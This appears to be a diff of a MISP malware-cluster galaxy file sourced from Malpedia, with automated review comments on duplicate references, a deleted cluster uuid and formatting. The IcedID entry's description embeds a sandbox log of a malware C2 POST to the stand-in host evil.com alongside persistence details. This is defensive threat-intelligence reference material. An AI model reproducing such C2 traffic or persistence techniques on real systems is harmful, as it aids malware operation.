+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/"
+ ],
+ "synonyms": [
+ "HttpDump"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f",
@@ -9609,23 +17961,73 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412", - "http://blogs.360.cn/post/analysis-of-apt-c-37.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter", + "https://twitter.com/3xp0rtblog/status/1324800226381758471" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c93fdbb9-aafc-441d-a66f-aaf038f10bd3", + "value": "Hunter Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hupigon", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-repurpose-hupigon-adult-dating-attacks-targeting-us-universities" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40157734-eb33-4187-bcc8-2cd168db6fda", + "value": "Hupigon" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d3d86184-3c5c-478b-8f8b-f56f1a02247d", + "value": "Hussar" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hxdef", + "https://de.securelist.com/malware-entwicklung-im-ersten-halbjahr-2007/59574/" ], "synonyms": [ - "houdini" + "HacDef", + "HackDef", + "HackerDefender" ], "type": [] }, - "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm" + "uuid": "906adc27-757d-42bd-b8a2-f8a134077343", + "value": "HxDef" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", 
+ "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://securelist.com/luckymouse-hits-national-data-center/86083/" ], "synonyms": [], 
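Review bot: The Hworm cluster with `"uuid": "94466a80-964f-467e-b4b3-0e1375174464"` is deleted outright and its slot reused by the new HxDef entry with a fresh uuid, so any event or attribute already tagged with the old cluster loses its reference; MISP galaxy practice is to keep a superseded cluster in place with `"revoked": true` (optionally related to the Houdini entry, which now lists `"Hworm"` as a synonym) rather than dropping it. Separately, the HyperBro refs now contain the same Team Cymru article under two hosts, `https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/` and `https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/`; one of them should be dropped, and the import script could dedupe refs by host-insensitive path. The HyperBro entry's closing lines are outside the hunk.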
@@ -9635,26 +18037,63 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 
44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within 
%LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: 
hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", - "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", - "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", + 
"https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", "https://www.youtube.com/watch?v=wObF9n2UIAM", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims", + "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://tccontre.blogspot.com/2021/01/", + "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", + "https://www.group-ib.com/blog/icedid", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", - "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + 
"https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", + "https://github.com/f0wl/deICEr", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", + "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766", + "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", + "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" + 
"https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back" ], "synonyms": [ - "BokBot" + "BokBot", + "IceID" ], "type": [] }, 
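Review bot: One of the added IcedID refs carries tracking parameters, `https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`; the query string should be stripped so the ref is canonical and deduplicates against the same URL if it appears elsewhere in the cluster. The IcedID description line is rewritten only to replace the literal curly quotes with `\u201c`/`\u201d`, which produces a multi-kilobyte diff with no semantic change; the import script should settle on one escaping policy (other new descriptions in this patch already use `\u2019`, so ASCII-only escaping appears to be the intent) and apply it consistently so later updates do not churn the same lines. The IcedID description also embeds an INetSim sandbox log with the emulated host `evil.com`; that text is pre-existing, but it is worth flagging that nothing in it is a real indicator.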
@@ -9680,19 +18119,26 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog",
- "http://www.kz-cert.kz/page/502"
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "http://www.kz-cert.kz/page/502",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko"
+ ],
+ "synonyms": [
+ "Fucobha"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861",
 "value": "Icefog"
 },
 {
- "description": "",
+ "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
+ "https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/",
 "https://securelist.com/ice-ix-not-cool-at-all/29111/",
 "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus"
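Review bot: The new Ice IX description says `derived of the Zeus botnet`, where the idiomatic form is `derived from the Zeus botnet`. The string is imported verbatim from the Malpedia API, so the correction belongs upstream or in a normalisation step of the import rather than in a hand edit of this file. The Ice IX entry's closing lines are outside the hunk.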
@@ -9703,6 +18149,34 @@
 "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3",
 "value": "Ice IX"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown",
+ "https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4f7ae3da-948c-4f74-8229-d5d7461f9c7d",
+ "value": "IconDown"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart"
+ ],
+ "synonyms": [
+ "Troxen"
+ ],
+ "type": []
+ },
+ "uuid": "bcc8b6ea-9295-4a22-a70d-422b1fd9814e",
+ "value": "IcyHeart"
+ },
 {
 "description": "",
 "meta": {
@@ -9734,6 +18208,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
 "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
 ],
 "synonyms": [],
@@ -9747,8 +18222,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/",
+ "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/",
 "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
- "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/"
+ "https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/"
 ],
 "synonyms": [],
 "type": []
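Review bot: The IcyHeart refs list contains the Malpedia URL `https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart` twice, which means the entry has no external source at all; the duplicate should be dropped, and the import script could dedupe `refs` per cluster before writing. The Imecab hunk on the same line adds `https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east` next to the older `www.symantec.com` URL for the same article; keeping both as a fallback is reasonable, but a normaliser should at least recognise the pair as a near-duplicate rather than treating it as a second source.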
@@ -9756,16 +18235,102 @@ "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", "value": "Imminent Monitor RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer", + "https://www.zscaler.com/blogs/research/immortal-information-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5f688e85-5f33-4ae6-880a-fc2e5146dd28", + "value": " Immortal Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.indigodrop", + "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e98b19ce-82c3-472d-98d1-d81341af4267", + "value": "IndigoDrop" + }, + { + "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. 
It is the first ever known malware specifically designed to attack electrical grids.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer", + "https://en.wikipedia.org/wiki/Industroyer", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ], + "synonyms": [ + "Crash", + "CrashOverride" + ], + "type": [] + }, + "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", + "value": "Industroyer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno", + "https://github.com/LimerBoy/Inferno" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7638ac2e-0cdc-4101-8e3d-54b7b74a9c92", + "value": "Inferno" + }, + { + "description": "", + "meta": { + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot", + "https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e0ce5055-45cd-46d2-971f-bb3904ec43a1", + "value": "InfoDot Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", - "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", - "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", - "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://cloud.tencent.com/developer/article/1738806", + "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", + "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" ], "synonyms": [ "Foudre" 
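Review bot: The new cluster value `" Immortal Stealer"` has a leading space, which becomes part of the tag MISP derives from it (`misp-galaxy:malpedia=" Immortal Stealer"`) and makes the name sort and match differently from every other value; it should be `"Immortal Stealer"`, and the import should strip surrounding whitespace from `value` fields. In the same hunk the Infy refs now list both `http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/` and the identical `https://` URL, a duplicate that only disappears if the script normalises the scheme before deduplicating. The Infy entry's closing lines are outside the hunk.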
@@ -9789,11 +18354,39 @@
 "value": "InnaputRAT"
 },
 {
- "description": "",
+ "description": "InnifiRAT is coded in .NET and targets personal data on infected devices, with it's top priority appearing to be bitcoin and litecoin wallet data.\r\n\r\nInffiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.\r\n\r\nIt attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality. \r\n\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat",
+ "https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b6aec7a7-7ebc-4aad-bcdf-1c3cb7044e3c",
+ "value": "win.innfirat"
+ },
+ {
+ "description": "ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fa022849-248c-4620-86b4-2a36c704b288",
+ "value": "Interception"
+ },
+ {
+ "description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole",
- "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
+ "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/",
+ "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/",
